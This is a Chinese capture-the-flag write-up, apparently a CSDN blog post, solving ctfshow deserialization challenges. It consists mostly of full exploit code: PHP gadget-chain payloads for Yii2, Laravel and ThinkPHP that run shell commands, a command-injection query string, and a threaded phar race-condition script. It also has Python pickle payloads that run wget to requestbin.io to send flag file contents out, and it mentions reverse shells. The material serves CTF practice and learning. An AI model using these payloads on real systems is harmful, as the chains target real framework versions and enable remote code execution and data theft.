• ctfshow 反序列化篇(下)

    web267(yii框架)

    开启靶机,是一个网站,试着搜索有没有重要信息。在这里发现是yii框架。

     我们使用弱口令admin/admin就可以登录进来了,那就继续收集重要信息。在源代码中发现了重要注释。

    让我们传一个view-source参数。

    出现了传参点,百度搜索yii反序列化漏洞,有相关的poc可以直接打。想知道构造思路可以看这篇文章: yii框架反序列化

    相关poc为:

    2. namespace yii\rest{
    3.     class CreateAction{
    4.         public $checkAccess;
    5.         public $id;
    6.  
    7.         public function __construct(){
    8.             $this->checkAccess = 'shell_exec';
    9.             $this->id = 'cp /fla* 1.txt';
    10.         }
    11.     }
    12. }
    13. namespace Faker{
    14.     use yii\rest\CreateAction;
    15.  
    16.     class Generator{
    17.         protected $formatters;
    18.  
    19.         public function __construct(){
    20.             $this->formatters['close'] = [new CreateAction(), 'run'];
    21.         }
    22.     }
    23. }
    24.  
    25. namespace yii\db{
    26.     use Faker\Generator;
    27.  
    28.     class BatchQueryResult{
    29.         private $_dataReader;
    30.  
    31.         public function __construct(){
    32.             $this->_dataReader = new Generator;
    33.         }
    34.     }
    35. }
    36. namespace{
    37.     echo base64_encode(serialize(new yii\db\BatchQueryResult));
    38. }
    39. ?>

    因为执行查看命令是没有回显的,所以我们可以将执行结果cp到新的文件,再访问新的文件就可以了。那么本地生成payload直接打。注意参数。

    web286(yii加强版)

    打开题目一样的网站,287的加强版。前面找传参点都是一样的。试了一下上一题用的payload,发现不行了。打过补丁。还是在网上找exp来做。上exp吧。

    2. namespace yii\rest{
    3.     class CreateAction{
    4.         public $checkAccess;
    5.         public $id;
    6.  
    7.         public function __construct(){
    8.             $this->checkAccess = 'exec';
    9.             $this->id = 'cp /fla* 1.txt';
    10.         }
    11.     }
    12. }
    13. namespace Faker{
    14.     use yii\rest\CreateAction;
    15.  
    16.     class Generator{
    17.         protected $formatters;
    18.  
    19.         public function __construct(){
    20.             // 这里需要改为isRunning
    21.             $this->formatters['isRunning'] = [new CreateAction(), 'run'];
    22.         }
    23.     }
    24. }
    25. namespace Codeception\Extension{
    26.     use Faker\Generator;
    27.     class RunProcess{
    28.         private $processes;
    29.         public function __construct()
    30.         {
    31.             $this->processes = [new Generator()];
    32.         }
    33.     }
    34. }
    35. namespace{
    36.     echo base64_encode(serialize(new Codeception\Extension\RunProcess()));
    37. }
    38. ?>

    之后自己还得复现一下。

    web269(yii加强版2)

    又是加强版,直接上poc吧。

    2.  
    3. namespace yii\rest{
    4.     class IndexAction{
    5.         public $checkAccess;
    6.         public $id;
    7.         public function __construct(){
    8.             $this->checkAccess = 'exec';
    9.             $this->id = 'cp /fla* 1.txt';
    10.         }
    11.     }
    12. }
    13. namespace yii\db{
    14.  
    15.     use yii\web\DbSession;
    16.  
    17.     class BatchQueryResult
    18.     {
    19.         private $_dataReader;
    20.         public function __construct(){
    21.             $this->_dataReader=new DbSession();
    22.         }
    23.     }
    24. }
    25. namespace yii\web{
    26.  
    27.     use yii\rest\IndexAction;
    28.  
    29.     class DbSession
    30.     {
    31.         public $writeCallback;
    32.         public function __construct(){
    33.             $a=new IndexAction();
    34.             $this->writeCallback=[$a,'run'];
    35.         }
    36.     }
    37. }
    38. namespace{
    39.  
    40.     use yii\db\BatchQueryResult;
    41.  
    42.     echo base64_encode(serialize(new BatchQueryResult()));
    43. }

    来自于bfengj的链子,相关文章写的很好:yii2框架 反序列化漏洞复现_bfengj的博客-CSDN博客_yii框架漏洞

    web270

    上一题师傅的链子依然能用,666

    web271(laravel5.7)

    打开题目给了代码。而且题目是给了传参点。

    考察laravel框架的反序列化。laravel源码 后期有时间复现一下。想知道链子构造建议看bfengj师傅的文章,写的太好了。laravel反序列化  直接放exp了。

    2. namespace Illuminate\Foundation\Testing{
    3.     use Illuminate\Auth\GenericUser;
    4.     use Illuminate\Foundation\Application;
    5.     class PendingCommand
    6.     {
    7.         protected $command;
    8.         protected $parameters;
    9.         public $test;
    10.         protected $app;
    11.         public function __construct(){
    12.             $this->command="system";
    13.             $this->parameters[]="cat /flag";
    14.             $this->test=new GenericUser();
    15.             $this->app=new Application();
    16.         }
    17.     }
    18. }
    19. namespace Illuminate\Foundation{
    20.     class Application{
    21.         protected $bindings = [];
    22.         public function __construct(){
    23.             $this->bindings=array(
    24.                 'Illuminate\Contracts\Console\Kernel'=>array(
    25.                     'concrete'=>'Illuminate\Foundation\Application'
    26.                 )
    27.             );
    28.         }
    29.     }
    30. }
    31. namespace Illuminate\Auth{
    32.     class GenericUser
    33.     {
    34.         protected $attributes;
    35.         public function __construct(){
    36.             $this->attributes['expectedOutput']=['hello','world'];
    37.             $this->attributes['expectedQuestions']=['hello','world'];
    38.         }
    39.     }
    40. }
    41. namespace{
    42.  
    43.     use Illuminate\Foundation\Testing\PendingCommand;
    44.  
    45.     echo urlencode(serialize(new PendingCommand()));
    46. }
    47.

    记得抓包打payload。flag不会回显到页面上。

    web272(laravel3.8)

    还是看文章:laravel5.8 反序列化漏洞复现_bfengj的博客-CSDN博客_laravel漏洞复现

    poc为:

    2. namespace Illuminate\Broadcasting{
    3.     use Illuminate\Bus\Dispatcher;
    4.     use Illuminate\Foundation\Console\QueuedCommand;
    5.     class PendingBroadcast
    6.     {
    7.         protected $events;
    8.         protected $event;
    9.         public function __construct(){
    10.             $this->events=new Dispatcher();
    11.             $this->event=new QueuedCommand();
    12.         }
    13.     }
    14. }
    15. namespace Illuminate\Foundation\Console{
    16.     class QueuedCommand
    17.     {
    18.         public $connection="cat /flag";
    19.     }
    20. }
    21. namespace Illuminate\Bus{
    22.     class Dispatcher
    23.     {
    24.         protected $queueResolver="system";
    25.  
    26.     }
    27. }
    28. namespace{
    29.  
    30.     use Illuminate\Broadcasting\PendingBroadcast;
    31.  
    32.     echo urlencode(serialize(new PendingBroadcast()));
    33. }
    34.

    web273(laravel5.8)

    上一个链子仍然能用。嘿嘿。

    web274(thinkphp5.1)

    终于有个我复现过的框架了。找到传参点。

    相关链子的构造可以看我这篇文章:thinkphp5.1.37反序列化链子分析_XiLitter的博客-CSDN博客

    直接放poc:

    2. namespace think;
    3.  
    4. abstract class Model{
    5.     protected $append = [];
    6.     private $data = [];
    7.     public function __construct()
    8.     {
    9.         $this->append = ["li"=>[]];
    10.         $this->data = ["li"=>new Request()];
    11.     }
    12. }
    13. namespace think\process\pipes;
    14. use think\model\Pivot;
    15. class Windows{
    16.     private $files = [];
    17.     public function __construct()
    18.     {
    19.         $this->files = [new Pivot()];
    20.     }
    21. }
    22. namespace think\model;
    23. use think\model;
    24. class Pivot extends Model{
    25.  
    26. }
    27. namespace think;
    28. class Request{
    29.     protected $hook = [];
    30.     protected $filter;
    31.     protected $config;
    32.     protected $param = [];
    33.     public function __construct()
    34.     {
    35.         $this->hook = ["visible"=>[$this,"isAjax"]];
    36.         $this->filter = 'system';
    37.         $this->config = ["var_ajax"=>''];//对这个键名附上值
    38.         $this->param = ['cat /flag'];
    39.     }
    40. }
    41. use think\process\pipes\Windows;
    42. echo base64_encode(serialize(new Windows()));
    43. ?>

    web275

    打开题目给出了源码。

    2. highlight_file(__FILE__);
    3. class filter{
    4.     public $filename;
    5.     public $filecontent;
    6.     public $evilfile=false;
    7.     public function __construct($f,$fn){
    8.         $this->filename=$f;
    9.         $this->filecontent=$fn;
    10.     }
    11.     public function checkevil(){
    12.         if(preg_match('/php|\.\./i', $this->filename)){
    13.             $this->evilfile=true;
    14.         }
    15.         if(preg_match('/flag/i', $this->filecontent)){
    16.             $this->evilfile=true;
    17.         }
    18.         return $this->evilfile;
    19.     }
    20.     public function __destruct(){
    21.         if($this->evilfile){
    22.             system('rm '.$this->filename);
    23.         }
    24.     }
    25. }
    26. if(isset($_GET['fn'])){
    27.     $content = file_get_contents('php://input');
    28.     $f = new filter($_GET['fn'],$content);
    29.     if($f->checkevil()===false){
    30.         file_put_contents($_GET['fn'], $content);
    31.         copy($_GET['fn'],md5(mt_rand()).'.txt');
    32.         unlink($_SERVER['DOCUMENT_ROOT'].'/'.$_GET['fn']);
    33.         echo 'work done';
    34.     }
    35. }else{
    36.     echo 'where is flag?';
    37. }

    这代码大致看就是个写入文件的操作,分别对文件名和文件内容进行了过滤,文件名不能出现php,文件内容不能出现flag。不然会删除这个文件。文件后缀不能有php,那怎么进行命令执行呢?我们仔细看这个system('rm '.$this->filename);,是不是可以构造filename来执行命令了。前面的rm用分号闭合掉就行了。那么我们构造payload。

    ?fn=;cat%20flag.php;

    不知道为什么,执行ls命令没有回显,那就直接读取flag吧。

    web276

    应该是web275的加强版。在进入system函数之前增加了admin的限制。

     admin初始化为false,那只能通过反序列化来修改属性了。那我们就需要本地生成phar文件。应该是要条件竞争了,但是我又不会写脚本,白嫖吧。脚本如下:

    1. import requests
    2. import hashlib
    3. import threading  #提供多线程
    4. url="http://d3f4254c-47cc-4c23-8498-5b02fe290e2d.challenge.ctf.show/"
    5. f=open("tter.phar","rb")   #打开文件
    6. content=f.read()
    7. def upload():
    8.     r=requests.post(url=url+"?fn=1.phar",data=content)   #上传phar文件
    9.  
    10. def read():
    11.     r=requests.post(url=url+"?fn=phar://1.phar/",data="1")   #phar协议读取
    12.     if "ctfshow{" in r.text or "flag{" in r.text:
    13.         print(r.text)
    14.         exit()
    15. while 1:
    16.     t1=threading.Thread(target=upload)
    17.     t2=threading.Thread(target=read)
    18.     t1.start()
    19.     t2.start()   #开启线程

    成功 跑出flag。

    web277(python反序列化)

    打开题目在注释中找到传参点。

     那么我们就用__reduce__魔术方法来执行命令。相关文章:一篇文章带你理解漏洞之 Python 反序列化漏洞 | K0rz3n's Blog

    构造exp:

    1. import os
    2. import pickle
    3. import base64
    4.  
    5. class abc(object):
    6.     def __reduce__(self):
    7.         return os.system, ('wget https://requestbin.io/1j6eke01?c=`cat fla*`',)
    8.  
    9. print(base64.b64encode(pickle.dumps(abc())))

    因为执行命令是没有回显的,所以看了Y4师傅的wp将数据外带出来。一开始是用dnslog外带数据,但是一些问题没处理好就没带出来,这是用requestbin网站也可以将数据给带出来,

    这个方式成功了之后就继续尝试了一下dnslog,发现意外成功了,真玄学。

     当然有vps也可以反弹shell。

    web278(加强版)

    题目中说了过滤了os.system函数,那么我们可以用eval函数导入os。也可以用os.popen。

    1. import os
    2. import pickle
    3. import base64
    4.  
    5. class abc(object):
    6.     def __reduce__(self):
    7.         return os.popen, ('wget https://requestbin.io/10mjkqp1?a=`cat fla*`',)
    8.  
    9. print(base64.b64encode(pickle.dumps(abc())))

    这里我知道上一题出现的错误了,用python2跑的序列化串会报错,那么应该是python3环境。成功外带出数据。

     这两个python反序列化题目相对来说比较简单。

    参考链接

    传送门

  • 相关阅读:
    电脑垃圾太多?这几个清理电脑的软件来看看吗?
    深入探索Spring Boot的条件装配与条件注解
    卷S人的166页精品Java面试手册,17大java面试系列专题让你全方位暴击大厂Java面试官!
    mysql oracle统计报表每天每月每年SQL
    计算机网络原理
    深入React源码揭开渲染更新流程的面纱
    从苹果、SpaceX等高科技企业的产品发布会看企业产品战略和敏捷开发的关系
    阿里云OSS和腾讯云COS对象存储介绍和简单使用
    网络安全(黑客)自学
    Slim-neck by GSConv:自动驾驶车辆检测器架构的更好设计范式(文末附代码)
  • 原文地址:https://blog.csdn.net/m0_62422842/article/details/126157641